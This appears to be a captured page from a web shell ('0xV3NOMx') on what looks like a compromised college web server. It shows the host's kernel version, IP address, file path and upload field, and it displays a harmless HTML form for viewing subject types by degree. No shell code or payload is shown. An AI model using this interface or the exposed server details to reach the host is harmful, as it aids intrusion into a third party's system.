0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.219.255.63


Current Path : /var/www/html/college/html_modules/
Upload File :
Current File : /var/www/html/college/html_modules/viewsubtype.html

<!DOCTYPE html>
<script type="text/javascript">
  $(function () {
    $("#tabs").tabs();
  });
  $(function () {
    $("#sub_tabs").tabs();
  });
</script>
<link rel="stylesheet" href="../select2/css/select2.min.css" />
<script src="../select2/js/select2.full.min.js"></script>
<link
  rel="stylesheet"
  href="../select2-bootstrap4-theme/select2-bootstrap4.min.css"
/>
<div id="tabs">
  <ul style="height: 20px">
    <li>View/Edit Subject Type</li>
  </ul>
  <div style="height: auto; overflow: auto; padding-top: 10px">
    <table cellpadding="5" cellspacing="2" width="100%">
      <tr>
        <td style="width: 140px" align="right">Degree</td>
        <td><font color="red">*</font> :</td>
        <td>
          <select id="degree" style="width: 400px; height: 30px" onchange="ViewSubjTypeDet()">
          </select>
        </td>
      </tr>
    </table>
  </div>
  <div
    id="data-table"
    style="height: auto; overflow: auto; padding-top: 10px"
  ></div>
</div>